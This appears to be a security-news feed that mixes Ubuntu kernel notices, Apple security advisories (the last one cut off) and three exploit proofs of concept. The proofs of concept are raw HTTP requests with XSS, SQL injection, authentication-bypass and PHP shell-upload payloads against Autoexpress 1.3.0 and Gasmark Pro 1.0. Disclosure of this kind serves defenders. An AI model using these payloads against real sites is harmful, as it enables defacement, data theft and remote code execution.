Ubuntu Security Notice 6701-1 - Ruihan Li discovered that the bluetooth subsystem in the Linux kernel did not properly perform permissions checks when handling HCI sockets. A physically proximate attacker could use this to cause a denial of service. It was discovered that the NVIDIA Tegra XUSB pad controller driver in the Linux kernel did not properly handle return values in certain error conditions. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6701-1  
March 18, 2024

linux, linux-aws, linux-hwe, linux-kvm, linux-oracle vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-hwe: Linux hardware enablement (HWE) kernel

Details:

Ruihan Li discovered that the bluetooth subsystem in the Linux kernel did  
not properly perform permissions checks when handling HCI sockets. A  
physically proximate attacker could use this to cause a denial of service  
(bluetooth communication). (CVE-2023-2002)

It was discovered that the NVIDIA Tegra XUSB pad controller driver in the  
Linux kernel did not properly handle return values in certain error  
conditions. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-23000)

It was discovered that Spectre-BHB mitigations were missing for Ampere  
processors. A local attacker could potentially use this to expose sensitive  
information. (CVE-2023-3006)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly handle block device modification while it is  
mounted. A privileged attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-34256)

Eric Dumazet discovered that the netfilter subsystem in the Linux kernel  
did not properly handle DCCP conntrack buffers in certain situations,  
leading to an out-of-bounds read vulnerability. An attacker could possibly  
use this to expose sensitive information (kernel memory). (CVE-2023-39197)

It was discovered that the Siano USB MDTV receiver device driver in the  
Linux kernel did not properly handle device initialization failures in  
certain situations, leading to a use-after-free vulnerability. A physically  
proximate attacker could use this cause a denial of service (system crash).  
(CVE-2023-4132)

Pratyush Yadav discovered that the Xen network backend implementation in  
the Linux kernel did not properly handle zero length data request, leading  
to a null pointer dereference vulnerability. An attacker in a guest VM  
could possibly use this to cause a denial of service (host domain crash).  
(CVE-2023-46838)

It was discovered that a race condition existed in the AppleTalk networking  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-51781)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kernel  
did not properly handle connect command payloads in certain situations,  
leading to an out-of-bounds read vulnerability. A remote attacker could use  
this to expose sensitive information (kernel memory). (CVE-2023-6121)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly handle the remount operation in certain cases,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2024-0775)

Notselwyn discovered that the netfilter subsystem in the Linux kernel did  
not properly handle verdict parameters in certain cases, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2024-1086)

It was discovered that a race condition existed in the SCSI Emulex  
LightPulse Fibre Channel driver in the Linux kernel when unregistering FCF  
and re-scanning an HBA FCF table, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-24855)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.15.0-1129-oracle  4.15.0-1129.140  
   linux-image-4.15.0-1150-kvm     4.15.0-1150.155  
   linux-image-4.15.0-1166-aws     4.15.0-1166.179  
   linux-image-4.15.0-223-generic  4.15.0-223.235  
   linux-image-4.15.0-223-lowlatency  4.15.0-223.235  
   linux-image-aws-lts-18.04       4.15.0.1166.164  
   linux-image-generic             4.15.0.223.207  
   linux-image-kvm                 4.15.0.1150.141  
   linux-image-lowlatency          4.15.0.223.207  
   linux-image-oracle-lts-18.04    4.15.0.1129.134  
   linux-image-virtual             4.15.0.223.207

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.15.0-223-generic  4.15.0-223.235~16.04.1  
   linux-image-4.15.0-223-lowlatency  4.15.0-223.235~16.04.1  
   linux-image-generic-hwe-16.04   4.15.0.223.7  
   linux-image-lowlatency-hwe-16.04  4.15.0.223.7  
   linux-image-oem                 4.15.0.223.7  
   linux-image-virtual-hwe-16.04   4.15.0.223.7

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6701-1  
   CVE-2023-2002, CVE-2023-23000, CVE-2023-3006, CVE-2023-34256,  
   CVE-2023-39197, CVE-2023-4132, CVE-2023-46838, CVE-2023-51781,  
   CVE-2023-6121, CVE-2024-0775, CVE-2024-1086, CVE-2024-24855

Ubuntu Security Notice USN-6701-1

Tramyardg Autoexpress version 1.3.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48903# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903https://www.cve.org/CVERecord?id=CVE-2023-48903# Description:Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.# Proof of Concept:+ Go to "http://localhost/autoexpress"+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)+ The form-data name "imageType[]" is vulnerable# Sample RequestPOST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1Host: localhostContent-Length: 17016Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YROrigin: http://localhostAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="files[]"; filename="image.jpeg"Content-Type: image/jpegIMAGE_CONTENT------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="id"CAR_ID------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="fd[]"IMAGE_CONTENT_BASE64_ENCODED------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="imgType[]"data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--

Tramyardg Autoexpress 1.3.0 Cross Site Scripting

Tramyardg Autoexpress version 1.3.0 allows for authentication bypass via unauthenticated API access to admin functionality. This could allow a remote anonymous attacker to delete or update vehicles as well as upload images for vehicles.

    # Exploit Title: tramyardg autoexpress - Authentication Bypass# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48902# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48902https://www.cve.org/CVERecord?id=CVE-2023-48902# Description:Autoexpress 1.3.0 allows for authentication bypass via unauthenticated API access to admin functionality. This could allow a remote anonymous attacker to delete or update vehicles as well as upload images for vehicles.# Proof of Concept:+ Go to "http://localhost/autoexpress"+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)# Sample RequestPOST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1Host: localhostContent-Length: 17016Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YROrigin: http://localhostAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="files[]"; filename="image.jpeg"Content-Type: image/jpegIMAGE_CONTENT------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="id"CAR_ID------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="fd[]"IMAGE_CONTENT_BASE64_ENCODED------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="imgType[]"data:image/jpeg;base64------WebKitFormBoundary9juDWgTa5YsjE2YR--

Tramyardg Autoexpress 1.3.0 Authentication Bypass

Tramyardg Autoexpress version 1.3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: tramyardg autoexpress - SQL Injection# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48901# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901https://www.cve.org/CVERecord?id=CVE-2023-48901# Description:Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.# Proof of Concept:+ Go to "http://localhost/autoexpress/admin/sign-in.php"+ Sign in with Admin credentials+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]+ Send it to Repeater+ Captured Burp Request:POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close# Sample RequestPOST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close

Tramyardg Autoexpress 1.3.0 SQL Injection

Ubuntu Security Notice 6700-1 - It was discovered that the Layer 2 Tunneling Protocol implementation in the Linux kernel contained a race condition when releasing PPPoL2TP sockets in certain conditions, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the ext4 file system implementation in the Linux kernel did not properly handle block device modification while it is mounted. A privileged attacker could use this to cause a denial of service or possibly expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6700-1  
March 18, 2024

linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-kvm: Linux kernel for cloud environments  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

It was discovered that the Layer 2 Tunneling Protocol (L2TP) implementation  
in the Linux kernel contained a race condition when releasing PPPoL2TP  
sockets in certain conditions, leading to a use-after-free vulnerability.  
A local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20567)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly handle block device modification while it is  
mounted. A privileged attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-34256)

Eric Dumazet discovered that the netfilter subsystem in the Linux kernel  
did not properly handle DCCP conntrack buffers in certain situations,  
leading to an out-of-bounds read vulnerability. An attacker could possibly  
use this to expose sensitive information (kernel memory). (CVE-2023-39197)

It was discovered that a race condition existed in the AppleTalk networking  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-51781)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly handle the remount operation in certain cases,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2024-0775)

Notselwyn discovered that the netfilter subsystem in the Linux kernel did  
not properly handle verdict parameters in certain cases, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2024-1086)

It was discovered that a race condition existed in the SCSI Emulex  
LightPulse Fibre Channel driver in the Linux kernel when unregistering FCF  
and re-scanning an HBA FCF table, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-24855)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.4.0-1130-kvm      4.4.0-1130.140  
   linux-image-4.4.0-252-generic   4.4.0-252.286  
   linux-image-4.4.0-252-lowlatency  4.4.0-252.286  
   linux-image-generic             4.4.0.252.258  
   linux-image-generic-lts-xenial  4.4.0.252.258  
   linux-image-kvm                 4.4.0.1130.127  
   linux-image-lowlatency          4.4.0.252.258  
   linux-image-lowlatency-lts-xenial  4.4.0.252.258  
   linux-image-virtual             4.4.0.252.258  
   linux-image-virtual-lts-xenial  4.4.0.252.258

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.4.0-1129-aws      4.4.0-1129.135  
   linux-image-4.4.0-252-generic   4.4.0-252.286~14.04.1  
   linux-image-4.4.0-252-lowlatency  4.4.0-252.286~14.04.1  
   linux-image-aws                 4.4.0.1129.126  
   linux-image-generic-lts-xenial  4.4.0.252.219  
   linux-image-lowlatency-lts-xenial  4.4.0.252.219  
   linux-image-virtual-lts-xenial  4.4.0.252.219

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6700-1  
   CVE-2022-20567, CVE-2023-34256, CVE-2023-39197, CVE-2023-51781,  
   CVE-2024-0775, CVE-2024-1086, CVE-2024-24855

Ubuntu Security Notice USN-6700-1

Gasmark Pro version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: GASMARK PRO-1.0 File Upload RCE## Author: nu11secur1ty## Date: 03/17/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/## Description:Vulnerable input:`<input type="file" class="form-control" id="productImage"name="productImage" style="width:auto;">`This application suffers from shell upload and remote code executionvulnerability, the attacker easilycan destroy this system, when he has credentials.STATUS: HIGH- Vulnerability CRITICAL[+]Exploit:```PHPPOST /gasmark/gasmark/php_action/createclient.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=1afinf22p9snl2nai24g29duucContent-Length: 1063Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/gasmark/gasmark/add_client.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="currnt_date"------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="name"pwned------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="gender"Female------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="mob_no"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="reffering"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="address"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"Content-Type: application/octet-stream<?php// by nu11secur1ty - 2023$fh = fopen('test.html', 'a');fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');fclose($fh);//nlink('test.html');?>------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="create"------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)## Time spent:00:25:00

Gasmark Pro 1.0 Shell Upload

Apple Security Advisory 03-12-2024-1 - GarageBand 10.4.11 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-12-2024-1 GarageBand 10.4.11

GarageBand 10.4.11 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214090.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

GarageBand  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination or arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-23300: Marc Schoenefeld, Dr. rer. nat.

GarageBand 10.4.11 may be obtained from the App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXw5dYACgkQX+5d1TXa  
IvpFLw/9ExaKuCx71r7iHpq/1M5z8aHNZNl3mZPP/NoVQIs8/ERz/n0fBRRljSZg  
8LnRH2lsRBKZtxN9CVEu5H5W8xAHa6DMdvMozjvwRbWFh0xDlLtgXbpuv9GGTGcB  
tmu9uQxpebG+s5MTfng2gZ1bSQ8G8dvEicHmLOsjIps8cI89uOiciXnFKb7GEOgD  
CO6quhznWETyzRZwAQtGQiD9jI7xgrlZLIGYb/dKg+WAvJrPvXvhZPLNdWCTwikp  
RD7xf2lzfu8S+o00FrjFQ1r5Xdt/GW8VUiT+r8cb65+v9HESzJUs2hoCXxQtzKYD  
SSAzbbAG9/n4Ku92jGItiGRk0M/wjJSvwWoBlUh3LTjA3XM75+vohl2PCGOoan+r  
TDTDf9PbAnSP4ysWM8/uXphebzLDww2c0pDaHRx6ZhAwi3BsHForVXJyD3DVWC92  
kw9PoYR3vcaJzAvDlWmrNTzrRRIU7SDT053fwst92zltirXjJB8lGYmtZTxWTbfS  
r6zCafVaxDhnuiDOdfnLSo0h5KBI1NXqG4H2mwI4f0ddP3Xn+m3XnF/apX3CXLZz  
58ulakxmg8Xsil0oV/1k46aQnEXjy2bwyt8CdUxOgcamd/haakOh0xsAnKltNbPi  
LUtwvFj6mbYV8u7PHgQSvK4O8Mmdm5BS48TNXZT6WR8Xz06DHp0=  
=JCnR  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-12-2024-1

Apple Security Advisory 03-07-2024-7 - visionOS 1.1 addresses buffer overflow, bypass, code execution, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-7 visionOS 1.1

visionOS 1.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214087.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Vision Pro  
Impact: An app may be able to spoof system notifications and UI  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-23262: Guilherme Rambo of Best Buddy Apps (rambo.codes)

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-23258: Zhenjiang Zhao of pangu team and Qianxin

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

Metal  
Available for: Apple Vision Pro  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Persona  
Available for: Apple Vision Pro  
Impact: An unauthenticated user may be able to use an unprotected  
Persona  
Description: A permissions issue was addressed to help ensure Personas  
are always protected  
CVE-2024-23295: Patrick Reardon

RTKit  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Safari  
Available for: Apple Vision Pro  
Impact: An app may be able to fingerprint the user  
Description: The issue was addressed with improved handling of caches.  
CVE-2024-23220

UIKit  
Available for: Apple Vision Pro  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Vision Pro  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) and 이준성(Junsung  
Lee) for their assistance.

Model I/O  
We would like to acknowledge Junsung Lee for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Safari  
We would like to acknowledge Abhinav Saraswat, Matthew C, and 이동하 ( Lee  
Dong Ha of ZeroPointer Lab ) for their assistance.

WebKit  
We would like to acknowledge Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/kb/HT214009  To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqch0ACgkQX+5d1TXa  
Ivp/nA//XUiuB8BB/bRbBd0c9z/0DScN1cEWhZaAiWh7HGiOji+HjUv3GocXDHTh  
65MqZ3y4C08Qr5qDNzZOnaTUZgbk+h3Pz62SoSS0deI3xp1uNpHsmtSqMh6Qs30I  
/IMBpmBuyqoL6w9KBSAubqsrwT/SVQuz67yMCSNUQ27KL3Dymf1JFKf+oaKYTC5R  
TRrmZ1yzWkvziGYYsjUR+G+HiwnQza/39sFOu7Eezkv+lqtQcP1v2eFRporxqvDX  
QejHf4mUIqNZs9KSe7z2uguRlMTbAaaOFt0UCXHhXXifQK9fmrOP9vKofAiy7S54  
NDuSa6gZzKvakC0VxUozGZaFhVocDDbWOBrH6eLI3RTR59sl5RXv4cFTZXp5Xfy4  
4xj99QM/zXb75TnPTWPlCJ9E2CfmFtfTRDa7wgZgeRL2dfHihaCV7/p28m8vdOAS  
QDbOBlReS27zwOcxVUSo+LcPvymve7ObCUc+ITwHW7V3Uq92mKfYmbv99ovxQGNB  
9LAChqBoYfWTbUAfP9/cvY++543CAE5xmzSIfnmFEH04ZA2Fh4Gc6mmo1W3Q24Hx  
QwhV1agy52x2t4g+BABQSNkwLDkS9yGj/SNqz1fknVyFoKry0tZAdXGM51PwQvV1  
7BnKw3PgU0EZK135spUgfhRBbemWfoISY9t/QqA2RCp9hiEsXZA=  
=pp0o  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-7

Apple Security Advisory 03-07-2024-6 - tvOS 17.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-6 tvOS 17.4

tvOS 17.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214086.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

Image Processing  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
